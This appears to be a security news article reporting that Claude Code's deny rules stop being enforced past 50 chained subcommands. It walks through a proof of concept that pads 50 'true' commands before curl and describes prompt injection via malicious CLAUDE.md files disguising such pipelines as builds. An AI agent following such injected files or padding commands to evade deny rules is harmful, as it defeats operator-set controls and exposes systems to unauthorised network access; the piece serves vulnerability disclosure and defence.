Claude Code Bypasses Safety Rules After 50 Chained Commands

AnthropIC's Claude Code will ignore its security deny rules if given a sufficiently long chain of subcommands, enabling attackers to bypass protections against risky operations like network requests. Security firm Adversa discovered the vulnerability following the leak of Claude Code's source code.

The Technical Issue

Claude Code uses deny rules configured in ~/.claude/settings.json to block access to potentially dangerous tools. For example, administrators can prevent curl execution with:

{ "deny": ["Bash(curl:*)"] }

However, the source code file bashPermissions.ts contains a hard-coded limit: MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. After 50 security-relevant subcommands, the system stops enforcing deny rules and instead asks the user for permission.

The code references an internal Anthropic issue (CC-643), with a comment noting that 50 was considered "a generous allowance for legitimate usage." This assumption held true for human-authored commands but failed to account for AI-generated attack chains.

Proof of Concept

Adversa demonstrated the vulnerability with a simple attack: they created a bash command combining 50 no-op "true" subcommands followed by a curl command. Claude Code asked for user authorization instead of denying curl outright—effectively bypassing the configured security policy.

The attack leverages prompt injection through malicious CLAUDE.md files that instruct the AI to generate 50+ subcommand pipelines disguised as legitimate build processes.

Real-World Impact

The vulnerability poses practical risks in two scenarios:

1. Developer approval workflows: When developers grant automatic approval (--dangerously-skip-permissions mode) or reflexively click through after long sessions, the bypass succeeds undetected.

2. CI/CD pipelines: When Claude Code runs in non-interactive mode without human oversight, injected commands bypass security controls entirely.

Status and Fix

Anthropic has already developed a fix internally using a parser called "tree-sitter" that properly validates command chains, but this parser is not included in public builds. Adversa notes that a single-line code change at line 2174 in bashPermissions.ts—switching the "behavior" key from "ask" to "deny"—would immediately resolve this particular vulnerability.

Anthropic did not respond to requests for comment.

What This Means

The vulnerability highlights a systematic problem: security limits designed around human behavior fail when AI-generated inputs can trivially exceed thresholds. The 50-command cap assumed attackers would limit their payload to avoid detection, but AI agents can generate arbitrarily complex command chains within a single prompt.

While the fix is straightforward, the discovery raises broader questions about Claude Code's deployment in automated environments where security assumptions may not hold. Organizations using Claude Code in CI/CD or other automated contexts should treat deny rules as a policy layer only—not a technical enforcement mechanism—until Anthropic patches this issue.